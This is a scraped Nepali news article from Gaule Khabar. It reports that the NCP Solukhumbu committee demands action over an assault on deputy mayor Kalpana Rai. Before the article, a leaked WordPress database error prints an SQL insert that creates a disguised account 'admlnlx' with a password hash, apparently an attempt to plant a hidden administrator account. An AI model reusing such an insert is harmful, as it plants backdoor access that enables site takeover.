WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Brula8LgBFoJvFQDuf/EBhGAAbCwQf/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 14:38:30', '', 'admlnlx', 'admlnlx')

उपमेरयर राईमाथिको हातपातको बिषयमा दोषीमाथि कारबाहीको माग गर्न नेकपा, सोलुखुम्बुको माग – Gaule Khabar

उपमेरयर राईमाथिको हातपातको बिषयमा दोषीमाथि कारबाहीको माग गर्न नेकपा, सोलुखुम्बुको माग

आकस्मिक नभई योजनावद्ध आक्रमण भएको...

उपमेरयर राईमाथिको हातपातको बिषयमा दोषीमाथि कारबाहीको माग गर्न नेकपा, सोलुखुम्बुको माग

जेठ २८, काठमाडौं – नेपाल कम्युनिष्ट पार्टी (नेकपा), जिल्ला कमिटि, सोलुखुम्बुले सोलु दुधकुण्ड नगरपालिकाकी उपमेयर कल्पना राईमाथि भएको हातपातमा संलग्नलाई कारबाही गर्न माग गरेको छ ।

 

बुधबार नेकपा जिल्ला कमिटिले प्रेस विज्ञप्ति जारी गरी उपमेरयर राईमाथिको नगरपालिकाका प्रचक्ता सारदा तामाङले गरेको हातपात गरेको घटना आकस्मिक नभई फरक राजनैतिक आस्था बोकेका व्यक्तिहरूको योजनावद्ध आक्रमण भनेको छ । ‘आक्रमण गर्ने र गराउनेलाई तुरुन्त पक्राउ गरी गम्भीर अनुसन्धान गर्न र दोषीहरूमाथि हदैसम्मको कानूनी कारबाही गर्न सम्बन्धित निकायसँग जोडदार माग गर्दछौं ।’, विज्ञप्तिमा उल्लेख छ ।

 

नेकपा जिल्ला कमिटि, सोलुखुम्बुले  मंगलबार भएको घटना सिंगो नगरपालिका, जिल्लाका समग्र स्थागीय तहका जनप्रतिनिधि, सभ्य समाज र लोकतान्त्रिक गणतन्त्रमाथिकै आक्रमणको रूपमा लिएको छ ।

नेकपाको प्रेस विज्ञप्ति

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका